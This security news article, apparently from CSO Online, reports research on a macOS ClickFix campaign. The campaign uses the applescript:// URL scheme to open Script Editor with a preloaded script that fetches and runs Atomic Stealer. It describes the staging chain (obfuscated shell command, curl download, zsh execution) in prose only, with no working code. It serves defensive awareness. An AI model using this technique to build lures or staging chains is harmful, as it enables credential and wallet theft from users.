ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user‑dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation.
Researchers at Jamf Threat Labs have identified a new macOS campaign that launches Apple’s native Script Editor directly from the browser, preloaded with malicious code. The technique abuses the applescript:// URL scheme to open Script Editor automatically, sidestepping Terminal entirely and delivering Atomic Stealer payloads with far less friction.
“Script Editor has a well-documented history as a malware delivery mechanism, so its presence here isn’t
surprising,” the researchers said in a blog post. “What is notable is its role in this ClickFix campaign and the fact that it was invoked via a URL scheme.”
The payload isn’t new. It’s Atomic Stealer, a credential-harvesting strain commonly deployed in macOS-focused campaigns.
Apple drops protection, attackers go around it
Conventionally, ClickFix chains relied on social engineering to get users to paste obfuscated commands into Terminal. Apple’s recent protections introduced scanning and prompts around pasted commands, adding restrictions to disrupt that flow.
This campaign routes around it.
Victims are directed to an Apple-themed page posing as a system fix or cleanup guide. Instead of copying anything, they click a button that invokes an applescript:// URL. That action opens Script Editor with a pre-populated script, ready to execute.
By not directing the user to interact with the Terminal, the attacker has removed a decision point that Apple enforced with macOS Tahoe 26.4. “Apple took direct aim at this in macOS 26.4, introducing a security feature that scans commands pasted into Terminal before they’re executed,” the researchers added. “It’s a meaningful friction point, but as this campaign illustrates, when one door closes, attackers find another.”
Script Editor is a native macOS utility and doesn’t carry the same immediate suspicion as Terminal for non-experienced users. However, there is still some non-targeted resistance to this technique.
The researchers pointed out that the behavior of the Script Editor may vary depending on the macOS version. “On recent versions of macOS Tahoe, an additional warning prompt is presented, requiring the user to allow the script to be saved to disk before execution,” they said.
Lightweight staging for Atomic Stealer
Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload using ‘curl’, and executes it via ‘zsh’. From here, standard info-stealing takes over with a ‘Mach-O’ binary written to a temporary location, its attributes adjusted, permissions set, and execution triggered.
This binary is a new variant of the Atomic Stealer.
The researchers noted that the staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It is modular, quick to update, and harder to catch at the first stage.
Atomic Stealer’s objectives are consistent with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, crypto wallet data, and developer artifacts. Previous reporting has shown that such stealers rarely operate in isolation, as exfiltrated data is almost always funneled into credential reuse attacks and account takeovers.
The original article found on Weak at the seams | CSO Online Read More
